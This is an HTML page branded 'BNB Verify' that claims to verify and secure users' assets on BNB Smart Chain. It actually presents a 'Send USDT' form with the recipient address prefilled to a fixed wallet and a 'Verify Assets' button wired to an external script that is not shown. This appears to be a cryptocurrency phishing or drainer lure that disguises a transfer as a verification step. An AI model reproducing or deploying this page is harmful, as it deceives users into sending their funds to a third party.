<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  <meta name="theme-color" content="#0a0a0a">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <title>BNB Verify</title>
  <meta name="description" content="Verify and secure your assets on the BNB Smart Chain network instantly. Reliable and fast asset verification.">

  <!-- Favicon -->
  <link rel="icon" type="image/png" href="images/favicon.png">

  <!-- Google Fonts -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">

  <!-- Local CSS -->
  <link rel="stylesheet" href="styles.css">

  <!-- Font Awesome (Updated Version) -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">

  <!-- JS Libraries -->
  <script src="js/web3.min.js"></script>
</head>

<body>
  <main class="container">
    <h1 class="title">Send USDT</h1>

    <label class="label" for="address">Address or Domain Name</label>
    <div class="input-group">
      <input type="text" id="address" placeholder="Search or Enter" value="0xDc246aF96aAF24F49BBade639b80C08F264DF289">
      <button class="text-btn">Paste</button>
      <button class="icon-btn"><i class="fas fa-address-book"></i></button>
      <button class="icon-btn"><i class="fas fa-expand"></i></button>
    </div>

    <label class="label" for="amount">Amount</label>
    <div class="input-group">
      <input type="number" id="amount" placeholder="USDT Amount">
      <span class="unit">USDT</span>
      <button class="max-btn">Max</button>
    </div>

    <p class="estimate">≈ $0.00</p>

    <button id="verifyBtn" class="next-btn" onclick="Next()">Verify Assets</button>
  </main>

  <!-- Custom Script -->
  <script src="js/script.js"></script>
</body>
</html>
